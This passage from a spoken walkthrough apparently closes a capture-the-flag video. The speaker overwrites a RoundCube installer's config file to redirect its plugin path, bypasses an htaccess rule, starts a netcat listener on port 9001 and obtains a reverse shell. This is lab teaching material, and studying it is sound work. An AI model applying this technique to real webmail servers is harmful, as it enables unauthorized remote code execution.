course, replacing the dev shm thing. So it's going to be var dub. And the tricky part is knowing it's var dub. It could either be old management / let's see, where is the path? Files 3124. So it could either be this or var dub HTML. And really, it could be an opt. It could be anywhere. But these are the two common locations, either var dub HTML and then the directory, or var dub and then the directory. So these would be the most two common places. We can send it. And if we scroll down, let's see, does it say updated? Webmail, installer. It says config file was saved successfully. So we overwrote the config of master mailer, replacing the plugins directory with this. And what it's going to do is append the .php for us, and RoundCube puts it in an include, so we bypass that htaccess rule that was there to begin with. So now if we start up a listener, so nclvnp 9001, and then access a RoundCube page, hopefully we'll get a shell. So hit enter there, and now we have a shell here. So that is doing it the intended way. I really, for some reason, just don't like that CVE. I like doing it the unintended way better, but hope you guys enjoyed it. Take care, and I will see you all next week.